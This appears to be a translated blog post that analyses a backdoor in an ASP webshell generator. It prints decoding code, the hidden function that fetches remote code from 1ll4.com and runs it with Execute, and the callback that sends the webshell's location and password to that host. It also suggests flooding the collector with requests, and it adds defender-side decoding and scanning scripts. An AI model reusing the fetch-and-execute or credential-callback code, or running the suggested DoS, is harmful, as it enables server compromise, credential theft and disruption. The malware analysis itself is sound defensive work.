13 WEBSHELL final backdoor discovery tour

Source: Internet
Author: User

Author: TheLostMind
Source: Brilliant notes

Last time I grabbed a webshell management site off the Internet it turned out to contain a backdoor: the server was trojaned, the database was wrecked, and it still has not been repaired. So be especially careful with other people's webshells.

I found a "13 WEBSHELL final" generator on the Internet.

Next we use it to generate an ASP WebShell.
The generated WebShell is encrypted.
Decoding that layer with the usual tool is straightforward and will not be detailed here; the decoded code is shown in 132.JPG.
Looking at the code, it is still encoded, and we can easily see that its decoding function is SinfoEn.
So let's decode it; someone has already written decoding code for it.
The following is the decoding code posted on the Freezing Point Extreme forum:

==================== Decode.asp ====================

<%
Pos = 2 ' fixed value used for decoding

' Alternate decoder (not used on this page): reverses the text, "!" -> newline, "|" -> quote
Function Fun(ShiSanObjstr)
    Dim ShiSanI, ShiSanNewStr
    ShiSanObjstr = Replace(ShiSanObjstr, "|", """")
    For ShiSanI = 1 To Len(ShiSanObjstr)
        If Mid(ShiSanObjstr, ShiSanI, 1) <> "!" Then
            ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr
        Else
            ShiSanNewStr = vbCrLf & ShiSanNewStr
        End If
    Next
    Fun = ShiSanNewStr
End Function

' "~" stands in for a double quote, "'" separates lines; each line is passed through EnCode
Function SinfoEn(ObjStr, ObjPos)
    Dim NewStr, I
    ObjStr = Replace(ObjStr, "~", """")
    NewStr = Split(ObjStr, "'")
    For I = 0 To UBound(NewStr)
        SinfoEn = SinfoEn & EnCode(NewStr(I), ObjPos) & vbCrLf
    Next
    SinfoEn = Left(SinfoEn, Len(SinfoEn) - 2) ' drop the trailing vbCrLf
End Function

' Cuts the string into blocks of ObjPos characters, reverses the block order,
' and appends the leftover tail unchanged; applying it twice restores the input
Function EnCode(ObjStr, ObjPos)
    Dim NewStr, TmpStr, I, LenStr
    LenStr = Len(ObjStr)
    For I = 0 To Int(LenStr / ObjPos) - 1
        TmpStr = Mid(ObjStr, I * ObjPos + 1, ObjPos) & TmpStr
    Next
    EnCode = TmpStr & Right(ObjStr, LenStr Mod ObjPos)
End Function

Data = Request.Form("x")
If Data = "" Then Data = "nothing"
Response.Write "<form method=post>"
Response.Write "<textarea name=x cols=80 rows=30>"
Response.Write Server.HTMLEncode(SinfoEn(Data, Pos))
Response.Write "</textarea>"
Response.Write "<input type=submit name=Submit1 value=submit>"
Response.Write "<input type=reset name=Submit32 value=reset>"
Response.Write "</form>"
%>

==================== End ====================

Now the code can be decoded directly, as shown in 133.jpg.
Following the usual way of hunting for backdoors in webshells, I searched for strings such as HTTP and found nothing suspicious.
Next, search for the keyword UserPass.
Look at its password verification code:
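As an added example (not code from the original post), here is a Python port of SinfoEn/EnCode together with a matching encoder, which the page does not show. It makes clear why one routine serves both directions: EnCode only reverses the order of fixed-size blocks, so applying it twice restores the input.

```python
"""Python port of SinfoEn/EnCode from Decode.asp above, plus the inverse."""


def encode_segment(s: str, pos: int) -> str:
    """Port of EnCode: cut s into blocks of `pos` characters, reverse the
    order of the blocks, and append the leftover tail (len(s) mod pos
    characters) unchanged. The block count is the same before and after,
    so applying it twice restores s: encode and decode are one function."""
    full = len(s) // pos
    blocks = [s[i * pos:(i + 1) * pos] for i in range(full)]
    return "".join(reversed(blocks)) + s[full * pos:]


def sinfo_decode(obj_str: str, pos: int) -> str:
    """Port of SinfoEn: '~' stands in for a double quote and a single quote
    separates lines; each line is un-permuted and the lines are rejoined
    with CRLF (the ASP code strips the trailing vbCrLf it appends)."""
    obj_str = obj_str.replace("~", '"')
    return "\r\n".join(encode_segment(line, pos) for line in obj_str.split("'"))


def sinfo_encode(source: str, pos: int) -> str:
    """Inverse of sinfo_decode (assumed shape; the generator's own encoder is
    not on the page). The decoder treats ' and ~ as separators, so source
    containing either cannot round-trip: refuse it instead of corrupting it."""
    if "'" in source or "~" in source:
        raise ValueError("source must not contain ' or ~")
    lines = source.replace('"', "~").split("\r\n")
    return "'".join(encode_segment(line, pos) for line in lines)


if __name__ == "__main__":
    # Constructed sample: two lines of ASP with the page's fixed value pos = 2
    src = 'Response.Write "Hi"\r\nx = 1'
    blob = sinfo_encode(src, 2)
    print(blob)                        # Hi ~teri.WseonspRe~'= x 1
    print(sinfo_decode(blob, 2) == src)  # True
```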

================================================================
If Session("web2a2dmin") <> UserPass Then
    If Request.Form("pass") <> "" Then
        If Serinf(Request.Form("pass"), pn) = UserPass Then
            Session("web2a2dmin") = UserPass
            Response.Redirect url
        Else
            RRs "Illegal Logon"
        End If
    Else
        Si = "<center><div style=""width:500px;border:1px solid #222;padding:22px;margin:100px;""><a href=""" & SiteURL & """ target=_blank>" & mname & "</a>"
        RRs Si
    End If
    Response.End
================================================================

The password is run through the Serinf function before it is compared. This is normal; nothing suspicious here.
Searching for Serinf turns up the following code:

================================================================
If Session("serinfo") = False Then
    SererInf "1ll4": Session("serinfo") = True
Else
    If action = "getTerminalInfo" Then
        SererInf "1ll4"
    End If
End If
================================================================

This looks a bit strange. Searching for session("serinfo") shows that it is never set anywhere earlier, so on the first request it must evaluate as false and SererInf is called. Let's look at the SererInf() function; searching for SererInf finds the following code:

================================================================
Function SererInf(inf)
    On Error Resume Next
    Set theserver = Server.CreateObject(Sot(13, 0))
    theserver.Open "GET", Right(Sot(13, 0), 4) & Chr(60 - pos) & "/" & Chr(pos + 45) & inf & Chr(46) & Mid(Sot(4, 0), 2, 1) & Chr(109 + pos) & Right(Sot(6, 0), 1) & Chr(47) & Right(Sot(1, 0), 1), False
    theserver.Send()
    If theserver.readyState <> 4 Then
        Exit Function
    End If
    Execute(theserver.responseText)
    Set theserver = Nothing
    If Err.Number <> 0 Then
        Err.Clear
    End If
End Function
================================================================

We can see that this is the backdoor. What does it do? Decode the following expression:

================================================================
Right(Sot(13, 0), 4) & Chr(60 - pos) & "/" & Chr(pos + 45) & inf & Chr(46) & Mid(Sot(4, 0), 2, 1) & Chr(109 + pos) & Right(Sot(6, 0), 1) & Chr(47) & Right(Sot(1, 0), 1)
================================================================

Searching for Sot shows that the array holds the following values:

================================================================
Sot(13, 0) = "Microsoft.XMLHTTP"
Sot(4, 0) = "Scripting.Dictionary"
Sot(6, 0) = "Adodb.Stream"
Sot(1, 0) = "wscript.shell"
================================================================

Checking further shows pos = 2. Now we can decode the string built by the function above, which is very simple:
Right(Sot(13, 0), 4) = http
Chr(60 - pos) = :
Chr(pos + 45) = /
Chr(46) = .
Mid(Sot(4, 0), 2, 1) = c
Chr(109 + pos) = o
Right(Sot(6, 0), 1) = m
Chr(47) = /
Right(Sot(1, 0), 1) = l

A really clever way to hide it!
The decoded string is:

================================================================
Http://1ll4.com
================================================================
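An added Python example, not from the original post, that mechanically resolves the Chr()/Mid()/Right() pieces of the Open argument against the Sot table and pos = 2, so the hidden string does not have to be worked out by hand. Two details worth knowing: Right(Sot(13,0),4) is really "HTTP" (Microsoft.XMLHTTP ends in upper case), which a URL accepts all the same, and the full expression ends in /l, matching the page the author visits next.

```python
import re

# Values recovered from the webshell source discussed on this page.
SOT = {13: "Microsoft.XMLHTTP", 4: "Scripting.Dictionary",
       6: "Adodb.Stream", 1: "wscript.shell"}

# The obfuscated argument of theserver.Open, as it appears in SererInf.
OBFUSCATED = ('Right(Sot(13,0),4) & Chr(60-pos) & "/" & Chr(pos+45) & inf & Chr(46) '
              '& Mid(Sot(4,0),2,1) & Chr(109+pos) & Right(Sot(6,0),1) & Chr(47) '
              '& Right(Sot(1,0),1)')

# One '&'-joined piece of a VBScript string expression (only the forms used here).
PIECE = re.compile(r"""\s*(?:
      Chr\(\s*(?P<chr>[\w\s+-]+?)\s*\)
    | Right\(\s*Sot\(\s*(?P<ri>\d+)\s*,\s*0\s*\)\s*,\s*(?P<rn>\d+)\s*\)
    | Mid\(\s*Sot\(\s*(?P<mi>\d+)\s*,\s*0\s*\)\s*,\s*(?P<ms>\d+)\s*,\s*(?P<mn>\d+)\s*\)
    | "(?P<lit>[^"]*)"
    | (?P<var>[A-Za-z_]\w*)
    )\s*(?:&|$)""", re.IGNORECASE | re.VERBOSE)


def arith(expr, env):
    """Evaluate '60-pos', 'pos + 45', '109 + pos' or '47' without eval()."""
    total = 0
    for sign, term in re.findall(r"([+-]?)\s*(\w+)", expr):
        value = env[term] if term in env else int(term)
        total += -value if sign == "-" else value
    return total


def deobfuscate(expr, env, sot=SOT):
    """Walk the pieces left to right and rebuild the string the backdoor hides."""
    out, position = [], 0
    while position < len(expr):
        m = PIECE.match(expr, position)
        if not m:
            raise ValueError("unsupported piece at: " + expr[position:position + 20])
        position = m.end()
        if m.group("chr") is not None:
            out.append(chr(arith(m.group("chr"), env)))
        elif m.group("ri") is not None:
            out.append(sot[int(m.group("ri"))][-int(m.group("rn")):])
        elif m.group("mi") is not None:
            start, count = int(m.group("ms")) - 1, int(m.group("mn"))  # Mid is 1-based
            out.append(sot[int(m.group("mi"))][start:start + count])
        elif m.group("lit") is not None:
            out.append(m.group("lit"))
        else:
            out.append(str(env[m.group("var")]))
    return "".join(out)


if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED, {"pos": 2, "inf": "1ll4"}))  # HTTP://1ll4.com/l
```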

Seeing this, isn't it odd? Why is the backdoor code incomplete?
Don't worry; let's visit http://1ll4.com/l.
Open the http://1ll4.com/l page and view its source. The code is as follows:

================================================================
Serurl = "http://1ll4.com/1?jpg=8&u=" & Serveru & "&p=" & UserPass
Set theserver = Server.CreateObject(Sot(13, 0))
theserver.Open "GET", Serurl, False
theserver.Send()
================================================================

Now we can see the complete picture. The parameter Serveru = Request.ServerVariables("HTTP_HOST") & url, that is, the full path of the webshell on the site, and the parameter UserPass is the password. It is encrypted, but it can be decrypted!
At this point the webshell is completely exposed; all the backdoor's author has to do next is go and collect the webshells!
I have modified this WebShell, removing the backdoor, adding some features and improving others. If you want to download it, see my blog: http://hi.baidu.com/lostmind
We can also see from the code that this submission has no cookie check, so the request can be submitted directly: find an HTTP cracking tool, fill in the address and parameters, and DoS it! Of course, writing a WebShell is not easy, so forgive him! At the same time, I remind my friends to take a closer look at other people's things.
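As an added defender's example (not part of the original post), a small rule-based scanner for the three traits this backdoor combines: a ProgID hidden behind an array lookup, a string built from Chr() arithmetic, and Execute() applied to an XMLHTTP responseText. The sample ASP is constructed from the SererInf code above plus one benign XMLHTTP use that must not be flagged.

```python
import re

# Constructed sample: the SererInf backdoor from the page, followed by a
# benign use of XMLHTTP that only displays the response and must not be flagged.
SAMPLE_ASP = """\
Function SererInf(inf)
On Error Resume Next
Set theserver = Server.CreateObject(Sot(13,0))
theserver.Open "GET", Right(Sot(13,0),4) & Chr(60-pos) & "/" & Chr(pos+45) & inf, False
theserver.Send()
Execute(theserver.responseText)
End Function
Set feed = Server.CreateObject("Microsoft.XMLHTTP")
feed.Open "GET", "http://example.invalid/news.xml", False
Response.Write feed.responseText
"""

RULES = {
    # Remote fetch-and-execute: text downloaded at runtime is run as script.
    "execute_remote_response": re.compile(
        r"\b(Execute|ExecuteGlobal|Eval)\s*\(?\s*\w+\.responseText", re.I),
    # ProgID taken from an array element instead of a string literal.
    "createobject_indirect": re.compile(r"CreateObject\s*\(\s*[A-Za-z_]\w*\s*\(", re.I),
    # Two or more Chr() calls joined with '&', as used to hide the callback URL.
    "chr_concat": re.compile(r"Chr\s*\([^)]*\)\s*&.*&\s*Chr\s*\(", re.I),
}


def scan_asp(source):
    """Return [(line_no, rule_name, line_text)] for every rule that fires."""
    hits = []
    for no, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((no, name, line.strip()))
    return hits


if __name__ == "__main__":
    for no, name, text in scan_asp(SAMPLE_ASP):
        print(f"line {no}: {name}: {text}")
```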
